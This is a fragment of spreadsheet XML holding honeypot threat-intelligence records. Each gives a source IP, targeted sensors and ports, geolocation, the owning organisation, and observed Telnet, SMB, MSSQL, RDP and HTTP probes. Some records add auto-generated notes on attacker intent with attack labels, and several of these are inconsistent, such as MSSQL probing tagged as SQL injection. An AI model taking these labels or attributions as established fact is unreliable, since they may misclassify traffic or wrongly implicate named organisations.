SMB client attempt to connect from IP 182.71.72.20, indicating possible malicious activity such as brute force login attempts or unauthorized access attempts. This could be a scan for vulnerable systems or exploitation of open shares. The intention may be to gain unauthorized access or spread malware."/>
    <s v="SMB Scanning &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="851"/>
    <x v="851"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T12:52:52"/>
    <d v="2025-04-25T12:52:52"/>
    <d v="2025-04-25T12:52:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:73d6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="852"/>
    <x v="852"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T12:18:54"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-25T12:18:54"/>
    <n v="152"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Obeetee Private Limited"/>
    <s v="2005-08-03"/>
    <s v="OEET-3646474-GOPIGANJ"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49825)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,29388)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,64603)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,40621)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,11964)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,20082)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,10561)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,16534)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,14893)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,61824)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49767)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49598)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,49895)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,12219)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,58188)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,54716)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,45630)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,61430)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,8498)}&amp;&amp;{Data_SMB:Incoming connection (125.17.181.218,12016)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d11:b5da"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The system is being probed for potential Microsoft SQL Server vulnerabilities, possibly as part of a reconnaissance or scanning activity to identify exploitable weaknesses. This could be an initial step by attackers before launching a more severe attack. The intention appears to be gathering information on the server's configuration and security posture."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="853"/>
    <x v="853"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T12:10:58"/>
    <d v="2025-03-26T14:41:50"/>
    <d v="2025-04-25T12:10:58"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="140832"/>
    <s v="Vietnam F Tech., JSC"/>
    <s v="FTECH"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d7d:ec54"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="854"/>
    <x v="854"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T12:05:28"/>
    <d v="2025-04-25T12:05:28"/>
    <d v="2025-04-25T12:05:28"/>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df:2726"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Attempt to connect to TELNET service, likely a port scan or reconnaissance activity._x000a_TELNET is an outdated protocol that should be closed to incoming traffic unless explicitly needed._x000a_This could indicate a potential vulnerability or unpatched system. &amp;&amp; No TELNET activity detected, indicating a potential evasion tactic by an attacker to avoid detection. _x000a_TELNET is a common service targeted by attackers for unauthorized access. _x000a_No attempts made to use the TELNET service in this instance."/>
    <s v="Telnet Attack &amp;&amp; Brute Force"/>
  </r>
  <r>
    <x v="855"/>
    <x v="855"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T11:45:02"/>
    <d v="2025-02-20T21:36:07"/>
    <d v="2025-04-25T11:45:02"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_NTP_H44"/>
    <s v="23&amp;&amp;NA&amp;&amp;443&amp;&amp;3389&amp;&amp;5900&amp;&amp;32838&amp;&amp;143"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="2005-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '5.182.38.84', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=user'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;NA&amp;&amp;{Data_IMAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b0b6"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="856"/>
    <x v="856"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T11:41:46"/>
    <d v="2024-12-07T17:54:48"/>
    <d v="2025-04-25T11:41:46"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Devinagar)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="13.0508"/>
    <s v="77.5709"/>
    <s v="45648"/>
    <s v="Bell Teleservices India Pvt Ltd"/>
    <s v="Bell Teleservices India Pvt Ltd"/>
    <s v="business"/>
    <s v="GopalanCollege WAN"/>
    <s v="2010-04-08"/>
    <s v="GopalanCollege-WAN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b22:f473"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="857"/>
    <x v="857"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T11:39:52"/>
    <d v="2025-04-25T11:39:52"/>
    <d v="2025-04-25T11:39:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:6264"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="858"/>
    <x v="858"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T11:10:41"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-25T11:10:41"/>
    <n v="344"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H35&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;53904&amp;&amp;23&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="Sydney"/>
    <s v="Sydney"/>
    <s v="2147714"/>
    <s v="2000"/>
    <s v="-33.8662"/>
    <s v="151.205"/>
    <s v="55581"/>
    <s v="BINARY NETWORKS PTY LTD"/>
    <s v="Binary Networks PTY LTD"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a6:3968"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="859"/>
    <x v="859"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-25T10:23:56"/>
    <d v="2025-04-19T01:02:28"/>
    <d v="2025-04-25T10:23:56"/>
    <n v="355"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="PE"/>
    <s v="Peru"/>
    <s v="LMA"/>
    <s v="Lima Province"/>
    <s v="Lima"/>
    <s v="Lima"/>
    <s v="3936456"/>
    <s v="15001"/>
    <s v="-12.1153"/>
    <s v="-77.0232"/>
    <s v="3132"/>
    <s v="Red Cientifica Peruana"/>
    <s v="Red Cientifica Peruana"/>
    <s v="business"/>
    <s v="Red Cientifica Peruana"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a184:374a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is scanning and probing various services to gather information about the system, potentially for future attacks. They are trying to identify vulnerabilities and open ports on the network. &amp;&amp; The attacker is probing various services and protocols to identify vulnerabilities or gain unauthorized access. They are sending requests with suspicious credentials, attempting to exploit authentication weaknesses and potentially gaining control over systems. The attacker's goal appears to be reconnaissance and exploitation of security loopholes."/>
    <s v="Port Scan Attack &amp;&amp;  Port Scanning"/>
  </r>
  <r>
    <x v="860"/>
    <x v="860"/>
    <s v="NA&amp;&amp;mx-ll-183.88.212-69.dynamic.3bb.co.th"/>
    <x v="0"/>
    <d v="2025-04-25T10:12:09"/>
    <d v="2023-07-25T11:27:48"/>
    <d v="2025-04-25T10:12:09"/>
    <n v="1241"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IRC_H42&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23&amp;&amp;6667&amp;&amp;9100&amp;&amp;443&amp;&amp;161&amp;&amp;389&amp;&amp;3403"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="20"/>
    <s v="Chon Buri"/>
    <s v="Bang Lamung"/>
    <s v="Pattaya"/>
    <s v="1614295"/>
    <s v="NA"/>
    <s v="12.9333"/>
    <s v="100.883"/>
    <s v="45758"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="residential"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b758:d445"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="861"/>
    <x v="861"/>
    <s v="ca-san-us-gd17-wk102.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-25T10:10:23"/>
    <d v="2024-04-11T13:48:00"/>
    <d v="2025-04-25T10:10:23"/>
    <n v="259"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_HTTPS_H5&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;443&amp;&amp;8443&amp;&amp;22256&amp;&amp;17463&amp;&amp;48347&amp;&amp;NA&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="NA"/>
    <s v="New York"/>
    <s v="5128581"/>
    <s v="10123"/>
    <s v="40.7128"/>
    <s v="-74.006"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="ICG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 